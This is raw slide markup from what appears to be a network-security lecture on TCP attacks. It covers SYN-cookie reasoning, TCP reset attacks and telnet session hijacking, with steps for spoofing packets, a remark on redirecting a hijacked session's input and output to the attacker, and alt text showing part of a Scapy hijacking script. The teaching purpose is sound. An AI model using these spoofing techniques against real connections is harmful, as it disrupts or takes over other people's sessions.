          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054311" y="267441"/>
            <a:ext cx="6839790" cy="4268029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71375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Attacker can not succeed</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK=y+1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3303247" y="3238659"/>
            <a:ext cx="5756116" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>To succeed, attacker needs to achieve        y=H(K,              )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 But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>he does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>not have K and so can not compute y.   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7739151" y="2754561"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175454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TCP Reset Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048500" y="1097000"/>
            <a:ext cx="4783800" cy="39171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To disconnect a TCP connection :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A sends out a “FIN” packet to B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B replies with an “ACK” packet. This closes the A-to-B communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now, B sends a “FIN” packet to A and A replies with “ACK”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Reset flag :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One of the parties sends RST packet to immediately break the connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="221" name="Shape 221"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1197850"/>
            <a:ext cx="3657600" cy="3467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TCP Reset Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2684207"/>
            <a:ext cx="8520675" cy="2119683"/>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Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To break up a TCP connection between A and B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed RST Packet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following fields need to be set correctly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP address, Source Port, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP address, Destination Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sequence number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963308" y="1212183"/>
            <a:ext cx="4546501" cy="1446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TCP Reset Attack: Automatic Python Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="385600" y="1017725"/>
            <a:ext cx="8049732" cy="4077795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2447019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TCP Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562342" y="2873667"/>
            <a:ext cx="7794258" cy="17322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Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To inject data in an established connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed TCP Packet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following fields need to be set correctly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP address, Source Port, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP address, Destination Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sequence number (within the receiver’s window)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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03" y="1195061"/>
            <a:ext cx="6980525" cy="15012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TCP Session Hijacking Attack: Sequence Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152476"/>
            <a:ext cx="8520600" cy="2056392"/>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If the receiver has already received some data up to the sequence number x, the next sequence number is x+1. If the spoofed packet uses sequence number as x+𝛿, it becomes out of order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The data in this packet will be stored in the receiver’s buffer at position x+𝛿, leaving 𝛿 spaces (having no effect). If 𝛿 is large, it may fall out of the boundary (i.e., larger than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>receive window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Shape 276"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550016" y="3064935"/>
            <a:ext cx="6400183" cy="14816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Hijacking a Telnet Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431447" y="1206259"/>
            <a:ext cx="8159966" cy="2267145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User establishes a telnet connection with the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker sniffs the packets from telnet server to client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generate a reply packet with payload data being our command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If this command is input/output redirection command, then we can redirect the server’s input/output to our attacker machine (i.e., taking over the telnet session).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7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571758DF-FE7A-4F5B-9911-9D0CE8FEBE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409059" y="4077550"/>
            <a:ext cx="7315716"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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to your case.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733970" y="189439"/>
            <a:ext cx="6197600"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2792"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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sniffing part (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hijacking_auto.py</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA"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026" name="Picture 2" descr="Machine generated alternative text:&#10;cli &#10;srv &#10;&quot;10.9 0 6 &#10;&quot;10.9 0 5 &#10;'tcp and src host { } and dst host { } and src port 23' . format(srv, cli) &#10;myFilter - &#10;print( &quot;Running Session Hijacking attack &#10;print( &quot;Filter used: {Y' . format(myFilter)) &#10;print( &quot;Spoofing TCP packets from Client (O) to Server &quot; . format(cli, srv)) &#10;# Change the i face field with the actual name on your container &#10;' br-07950545de5e' , &#10;filter=myFilter, prn=spoo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347" y="997586"/>
            <a:ext cx="8663093" cy="282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654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Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733970" y="189439"/>
            <a:ext cx="6197600"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2792"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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sproof</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> part (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hijacking_auto.py</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-CA"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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
